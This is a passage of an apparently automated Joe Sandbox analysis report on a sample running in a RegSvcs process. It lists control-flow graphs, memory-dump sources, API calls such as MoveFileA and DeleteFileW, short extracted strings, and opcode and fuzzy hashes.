                                                                                        control_flow_graph 1574 63d4e89-63d4ebc 1576 63d4ebe-63d4ec1 1574->1576 1577 63d4ec3-63d4edd 1576->1577 1578 63d4ee2-63d4ee5 1576->1578 1577->1578 1579 63d55cd-63d55cf 1578->1579 1580 63d4eeb-63d4fb6 1578->1580 1582 63d55d6-63d55d9 1579->1582 1583 63d55d1 1579->1583 1599 63d4fbc-63d500e call 63d5748 1580->1599 1600 63d503e-63d5045 1580->1600 1582->1576 1584 63d55df-63d55ec 1582->1584 1583->1582 1615 63d5014-63d5030 1599->1615 1601 63d50cc-63d50d5 1600->1601 1602 63d504b-63d50be 1600->1602 1601->1584 1621 63d50c9 1602->1621 1622 63d50c0 1602->1622 1618 63d503b 1615->1618 1619 63d5032 1615->1619 1618->1600 1619->1618 1621->1601 1622->1621
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fkq$XPkq
                                                                                        • API String ID: 0-3439102645
                                                                                        • Opcode ID: e740d16c159433e48425bd82114a4b78090a4bbc49782371d88a0cf78086ad6b
                                                                                        • Instruction ID: bc981f47c6ce4dddcb9026e5b9269e8231b9609cdba63885ce99ad2abe5f6250
                                                                                        • Opcode Fuzzy Hash: e740d16c159433e48425bd82114a4b78090a4bbc49782371d88a0cf78086ad6b
                                                                                        • Instruction Fuzzy Hash: BE41D571F002189BEB549BA8C8147AEBAF7FF88750F204429E506EB3D5DE798C058BD1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1809 ff8988-ff89e2 1811 ff89ed-ff89f1 1809->1811 1812 ff89e4-ff89ea 1809->1812 1813 ff89f9-ff8a2d MoveFileA 1811->1813 1814 ff89f3-ff89f6 1811->1814 1812->1811 1815 ff8a2f-ff8a35 1813->1815 1816 ff8a36-ff8a4a 1813->1816 1814->1813 1815->1816
                                                                                        APIs
                                                                                        • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00FF8A20
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileMove
                                                                                        • String ID:
                                                                                        • API String ID: 3562171763-0
                                                                                        • Opcode ID: 3cf46d7b2018f98d2baa4acad240d98a5d252547f18d01ccc2d6755092c56eea
                                                                                        • Instruction ID: 74937bc033cdfb620206da85482eaf821f30718fbc71611bb2c9de8d68f6832f
                                                                                        • Opcode Fuzzy Hash: 3cf46d7b2018f98d2baa4acad240d98a5d252547f18d01ccc2d6755092c56eea
                                                                                        • Instruction Fuzzy Hash: 422155B6C002099FCB10CF99D884ADEFFF1FF88320F24805AE918AB215C7759941CBA0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1818 ff8990-ff89e2 1820 ff89ed-ff89f1 1818->1820 1821 ff89e4-ff89ea 1818->1821 1822 ff89f9-ff8a2d MoveFileA 1820->1822 1823 ff89f3-ff89f6 1820->1823 1821->1820 1824 ff8a2f-ff8a35 1822->1824 1825 ff8a36-ff8a4a 1822->1825 1823->1822 1824->1825
                                                                                        APIs
                                                                                        • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00FF8A20
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileMove
                                                                                        • String ID:
                                                                                        • API String ID: 3562171763-0
                                                                                        • Opcode ID: e858ac1e01b87cfde4810a47f7f8d84e9db85b051b3f6d704e9c3e3905fd840e
                                                                                        • Instruction ID: 32b79f1ef35afaa9ceb731895b74ea0d961490229f2ca9e2222493dc85740fcd
                                                                                        • Opcode Fuzzy Hash: e858ac1e01b87cfde4810a47f7f8d84e9db85b051b3f6d704e9c3e3905fd840e
                                                                                        • Instruction Fuzzy Hash: 8F2116B6C012099FCB10CF99D984ADEFBF5FF88320F24805AE918AB214D7755941DBA5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1836 ff83a0-ff83f2 1838 ff83fa-ff8425 DeleteFileW 1836->1838 1839 ff83f4-ff83f7 1836->1839 1840 ff842e-ff8456 1838->1840 1841 ff8427-ff842d 1838->1841 1839->1838 1841->1840
                                                                                        APIs
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00FF8418
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: d1b38ba60259e976518df1d3e8f293c7f3654d1bcda083d8f1b5ee61a78ddbfd
                                                                                        • Instruction ID: 82b50252d27057b9b67582f8824f69d7f13523ec150847db281f1f135dcee443
                                                                                        • Opcode Fuzzy Hash: d1b38ba60259e976518df1d3e8f293c7f3654d1bcda083d8f1b5ee61a78ddbfd
                                                                                        • Instruction Fuzzy Hash: B72156B5C0065ACBCB10CF9AD441BEEFBB4FF48320F14816AD918A7240D778A941CFA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1827 ff7aac-ff83f2 1830 ff83fa-ff8425 DeleteFileW 1827->1830 1831 ff83f4-ff83f7 1827->1831 1832 ff842e-ff8456 1830->1832 1833 ff8427-ff842d 1830->1833 1831->1830 1833->1832
                                                                                        APIs
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00FF8418
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: 288cd3de7546276b5f0d15ee38c04a65fd30a0c5afba5b05d56f457449b94e64
                                                                                        • Instruction ID: bca0d11e834685653eb955f71f789e186e7674cc47c18c0d2cadf941a62985d0
                                                                                        • Opcode Fuzzy Hash: 288cd3de7546276b5f0d15ee38c04a65fd30a0c5afba5b05d56f457449b94e64
                                                                                        • Instruction Fuzzy Hash: FE2158B5C0061ADBCB10CF9AC445BAEFBF4FF48320F10816AD918A7250D778A941DFA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHfq
                                                                                        • API String ID: 0-2154135885
                                                                                        • Opcode ID: 8e100a860ef566f13fa155746c9fac755977621a3981368953beee53fd2dccee
                                                                                        • Instruction ID: c9d84064c45131c44f939bbe0671756663ded8b7b8f8126b91b13cdf4e8968ee
                                                                                        • Opcode Fuzzy Hash: 8e100a860ef566f13fa155746c9fac755977621a3981368953beee53fd2dccee
                                                                                        • Instruction Fuzzy Hash: E7418E72E00209DFDB559F64E8846AEBBB6FF85740F204929E406EB240DF74D946CBC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHfq
                                                                                        • API String ID: 0-2154135885
                                                                                        • Opcode ID: e226d256f674b6f4311e885398efaab3c1c1b993633400794a1ce3a314b8a709
                                                                                        • Instruction ID: 015b063971249a121d23bd84396b734de74be05f899c81335777e9d62ffb0400
                                                                                        • Opcode Fuzzy Hash: e226d256f674b6f4311e885398efaab3c1c1b993633400794a1ce3a314b8a709
                                                                                        • Instruction Fuzzy Hash: FD312432B002098FDB58AB38D91466F7AE7AF89240F20442CD606DB395EE35CD46D7E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (jq
                                                                                        • API String ID: 0-3225323518
                                                                                        • Opcode ID: 67b3f972fed1c8ff9ebc072b1dc407448f5ef9334539dbddf1d8bfc41118de97
                                                                                        • Instruction ID: 2e6827a4ed454acf4e2708ee9c4f9aeb3f6a6354b2c4a57663439f27b5904f18
                                                                                        • Opcode Fuzzy Hash: 67b3f972fed1c8ff9ebc072b1dc407448f5ef9334539dbddf1d8bfc41118de97
                                                                                        • Instruction Fuzzy Hash: 204158B0D00248CFDB28DFA9D88479EBBF1FF48310F24856AE449AB291C7755842CF51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (jq
                                                                                        • API String ID: 0-3225323518
                                                                                        • Opcode ID: 418f1655a372d35365d9ea5f40551f53d942921e2066e80847e905a14554d281
                                                                                        • Instruction ID: 6e19b06499cbf0e416cef7de0ad37074e9fc744d978ccf43f962feb868b8b5b9
                                                                                        • Opcode Fuzzy Hash: 418f1655a372d35365d9ea5f40551f53d942921e2066e80847e905a14554d281
                                                                                        • Instruction Fuzzy Hash: 2E01FC3520828DAFDB4AEF64EC1089F3FA5EF82310F244859F5814B1D2C9309D12D7A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq
                                                                                        • API String ID: 0-12477121
                                                                                        • Opcode ID: 465e49ee8c6a385cc1b9a72095b729d54ad3229ee3bbdd97a03a7902c3c474a6
                                                                                        • Instruction ID: 415d5555661da479ac0a91057bee66a0ba80261b43f02b4076fc05c2c58af851
                                                                                        • Opcode Fuzzy Hash: 465e49ee8c6a385cc1b9a72095b729d54ad3229ee3bbdd97a03a7902c3c474a6
                                                                                        • Instruction Fuzzy Hash: 71F05933F00109CF6FA45AA5690267D329EEF80290F040022CA81D7141DE35EA08C3D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 24699dd2b7007fa9f1d86e1ccc31bbda46de6a531a2622cec4174c73a4e2d600
                                                                                        • Instruction ID: 484b032b4ce40bb704376d3b2c6c692471c659bf068248a4baad1712e490b7d2
                                                                                        • Opcode Fuzzy Hash: 24699dd2b7007fa9f1d86e1ccc31bbda46de6a531a2622cec4174c73a4e2d600
                                                                                        • Instruction Fuzzy Hash: 04925635E002088FEB64DB68D584B9EB7F2FF46314F5484A9D409AB361DB35ED89CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9b817c46dc429fe992252c7951ccb1a304868ca4027b77a7f76815b0b092cae5
                                                                                        • Instruction ID: 0e7924db620db80c5897e34a11bf8a8595ce78a1d738d6d35e38ea34d08b55fe
                                                                                        • Opcode Fuzzy Hash: 9b817c46dc429fe992252c7951ccb1a304868ca4027b77a7f76815b0b092cae5
                                                                                        • Instruction Fuzzy Hash: 91B16F71E202098BDFA5DBA8E4807ADB7B5FB45310F10A926E415DB391DB34DC89CBD1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c37d158b2f1dcb461706fc4503b421ff95397e80aba5f13b91d1a6c5f3279858
                                                                                        • Instruction ID: cf03d05088dc905f0b7a145954d0de34b5a80f33eaa7b722a8052ef0636c80a1
                                                                                        • Opcode Fuzzy Hash: c37d158b2f1dcb461706fc4503b421ff95397e80aba5f13b91d1a6c5f3279858
                                                                                        • Instruction Fuzzy Hash: 61812C32E082159FEF66EB9CE894AFE77A6BF85314F051837DA06972D0CA314C45C752
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: df3958c139bd7f9dcc1a41cbbd87688a1cec30cd563a6e4121513595f8a2ef00
                                                                                        • Instruction ID: 7739746cb49276ad1858a0c069779174457c3ad5e82cb71f6d4b0c77ec1577e6
                                                                                        • Opcode Fuzzy Hash: df3958c139bd7f9dcc1a41cbbd87688a1cec30cd563a6e4121513595f8a2ef00
                                                                                        • Instruction Fuzzy Hash: 65918B31F002099BDB44DBA8D5A07AEB7F2EF89340F108429D50AEB399EE35DD468791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 746085fd9f29035ee521d4b98e03391ccb2d6bc65c7c66bad74d90894c4f885a
                                                                                        • Instruction ID: 065c9386a3c79c0636e9ec28db2efff7431d9471881e8ae36150569857691db7
                                                                                        • Opcode Fuzzy Hash: 746085fd9f29035ee521d4b98e03391ccb2d6bc65c7c66bad74d90894c4f885a
                                                                                        • Instruction Fuzzy Hash: 4261EFB2F001214FCF50966EDC8066FAADBAFC5220F154439E80EDB369DE66EC0687D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b41e0647df25c5a3c26991d42ff5603c1331e60c26f27084cf4af11408d92cd
                                                                                        • Instruction ID: 925adbd739f07506b3cc63ed53a3b2b5da4a9ff51b1eb1242879a542bb5acafb
                                                                                        • Opcode Fuzzy Hash: 6b41e0647df25c5a3c26991d42ff5603c1331e60c26f27084cf4af11408d92cd
                                                                                        • Instruction Fuzzy Hash: 72915E71E006198BDF60DF68C880B9DB7B1FF89300F208599D549BB395EB70AA85CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f43c1688ce70308fd76b1f48942cdf56f56a35000d39f751323d36b904f660f3
                                                                                        • Instruction ID: a31356f5b4c015d7d36f067a596b785b08f9e87283683b4cda367691e44c07e3
                                                                                        • Opcode Fuzzy Hash: f43c1688ce70308fd76b1f48942cdf56f56a35000d39f751323d36b904f660f3
                                                                                        • Instruction Fuzzy Hash: AC914D71E006198BDF60DF68C880B9DB7B1FF89300F208599D549BB395EB70AA85CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22b0b22fbf258d1c84abaf8f7eab4c76bcbe76a6147af81ddcda70cbe2925a5b
                                                                                        • Instruction ID: 9e9efba3f60121b4f1be63e8880ddf8db9d2c5cda1539ba920c11504d51778ee
                                                                                        • Opcode Fuzzy Hash: 22b0b22fbf258d1c84abaf8f7eab4c76bcbe76a6147af81ddcda70cbe2925a5b
                                                                                        • Instruction Fuzzy Hash: B11143B5904248CFDB20CF99D885BDEBBF4EB88320F24844AE458A7350C374A944CFA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 908b6a269166391c12e536562b00cd5b85303f2d0c4096c35767e5371c55add0
                                                                                        • Instruction ID: 8cd8a9fa072317597419617a30a62437e34e30427a8a547d73c37e971198ce88
                                                                                        • Opcode Fuzzy Hash: 908b6a269166391c12e536562b00cd5b85303f2d0c4096c35767e5371c55add0
                                                                                        • Instruction Fuzzy Hash: 30416272F106099FDF61CFA9E880AAFFBB1FB45320F20892AD155D7650D730A9498BD1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4c7f70c4c148fb956196f836d2aa1a4db9b4e6a7e3e4b284ffa23cec9ee66062
                                                                                        • Instruction ID: f471f66b3c4dc68b6e204d6cdba9ba0fd303d0c731d7060d3bb10a3b9cd13be0
                                                                                        • Opcode Fuzzy Hash: 4c7f70c4c148fb956196f836d2aa1a4db9b4e6a7e3e4b284ffa23cec9ee66062
                                                                                        • Instruction Fuzzy Hash: D541B032E003459FDB05CF68D8A469EBBB2EF86304F14855AE806EB351DB74ED46CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c540650c62a78a6c75f3cbb4011e76e96ffb935e049da9113fbb4c04029f1720
                                                                                        • Instruction ID: 90ee4c8cc57fa7f17886dd08e8e88ad28be1a5441fb029a1677a8fbcb2037daa
                                                                                        • Opcode Fuzzy Hash: c540650c62a78a6c75f3cbb4011e76e96ffb935e049da9113fbb4c04029f1720
                                                                                        • Instruction Fuzzy Hash: C441C3B5D01309DBDB24DF99C984ADDBBB5FF48304F248429D408BB250D7756A4ACF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 319ebdd2afa8b97d8f50134c7f4b4585e5b32e2ad5990714bb3a3b239ffdb582
                                                                                        • Instruction ID: 18c51a02f2449c83c8f1d5e11778a6e41b22c9430599f02cab4a8c4e2f0dbda1
                                                                                        • Opcode Fuzzy Hash: 319ebdd2afa8b97d8f50134c7f4b4585e5b32e2ad5990714bb3a3b239ffdb582
                                                                                        • Instruction Fuzzy Hash: B631CB35D0464ACEDF10EFA8D8848AEFBB1FF49300F509A6AE949A7151E730E985CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef0825cb1776fc62dcfcc707256466db622e7aa12928e1dac1e4a9b4680dc5aa
                                                                                        • Instruction ID: c63d47ecf2a63a68a475a57e6c12ed86f6b8b3d3be1a298482545817d2c67862
                                                                                        • Opcode Fuzzy Hash: ef0825cb1776fc62dcfcc707256466db622e7aa12928e1dac1e4a9b4680dc5aa
                                                                                        • Instruction Fuzzy Hash: 0F41B3B5D01309DBDB24DFAAC984ADDFBB5BF48304F248029D408BB254D7756A4ACF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 671fd2061bfe2ccca6001f1fd1d3c092657e7e036d04ecca2ac0d246f4b522ee
                                                                                        • Instruction ID: c3832fa0a50515736f51d1e23b88f33adc145416a3f14ee079cb1d7151e257f3
                                                                                        • Opcode Fuzzy Hash: 671fd2061bfe2ccca6001f1fd1d3c092657e7e036d04ecca2ac0d246f4b522ee
                                                                                        • Instruction Fuzzy Hash: D5418D30A0470ACFDB05EF69D89469DBBF1FF89310F14D659E409AB261EB70A981CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec74779395c90758ba8b5e4a4d5fd85dd73e313d56f388e5ec17aaea78496f1d
                                                                                        • Instruction ID: 1f77b6ef42925f5ff92f6b8220824a3c07d3c91b03c8b382d1dec432ace44777
                                                                                        • Opcode Fuzzy Hash: ec74779395c90758ba8b5e4a4d5fd85dd73e313d56f388e5ec17aaea78496f1d
                                                                                        • Instruction Fuzzy Hash: C231A232F001188FDB50DBB99951BEE76F6EF88650F048029DA16F7391DA35DD0187E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c274009f7f087944e96801420751c26107bedf187d48c21ab2ce1f52fc15c614
                                                                                        • Instruction ID: fd7c5dcbd0ee8c6d3bb9dd093db27ba290154723b78e9b4c9c9044f879f70152
                                                                                        • Opcode Fuzzy Hash: c274009f7f087944e96801420751c26107bedf187d48c21ab2ce1f52fc15c614
                                                                                        • Instruction Fuzzy Hash: FF315A31E102099BCB19CF64E894A9EF7B2FF89300F108529E806E7354DB74AD46CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f8f8bdd94ed2c41bafeadb5a68c00bb89085d3506d73c157292317bf7bf0c6a
                                                                                        • Instruction ID: 4422c08202cb636b2918d4b77b6fa580de3bddabf1f776b711af2f996cd5cd2a
                                                                                        • Opcode Fuzzy Hash: 4f8f8bdd94ed2c41bafeadb5a68c00bb89085d3506d73c157292317bf7bf0c6a
                                                                                        • Instruction Fuzzy Hash: 71318E32F001188FEB50DBB99951AAEB6F6EF88750F148029EA05F7291EA35DD0087E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2722cea06688bc101cae31389862ae689b4d554b6ef3dcdf288c359ab680c93e
                                                                                        • Instruction ID: 7fccec8753116391eeda636f6933a29ca088e6021375159433b6c4dbfe86ce97
                                                                                        • Opcode Fuzzy Hash: 2722cea06688bc101cae31389862ae689b4d554b6ef3dcdf288c359ab680c93e
                                                                                        • Instruction Fuzzy Hash: A53105756042058FCB11EF78D8584ABBBF2EF81204B1584A9D606DB352EF75D80ADB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e58654533e4beec696c574e4b204ddeaa53467c957f1f3150aeeeec17af0ae41
                                                                                        • Instruction ID: e005d7c8d1e9a23cc7335915b9124b0dfda063b1dd78eb0a269eabc223074c08
                                                                                        • Opcode Fuzzy Hash: e58654533e4beec696c574e4b204ddeaa53467c957f1f3150aeeeec17af0ae41
                                                                                        • Instruction Fuzzy Hash: E521FF32F101189BDF98E679E9616AEBBF7FF84250F108529E506EB384EE25DD0587C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 759965fe5502cfdf5c502d6d4fa033a60aa637a8f6468653776c874b7df09b90
                                                                                        • Instruction ID: cbd63e70961845543cd7ecbc221eecbc999e70a0aa847838c9c4820024e21ec3
                                                                                        • Opcode Fuzzy Hash: 759965fe5502cfdf5c502d6d4fa033a60aa637a8f6468653776c874b7df09b90
                                                                                        • Instruction Fuzzy Hash: 93112976F002089FDB04EFA5EC499EE7BBAEFC5310B058066E519DB251EB349906CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
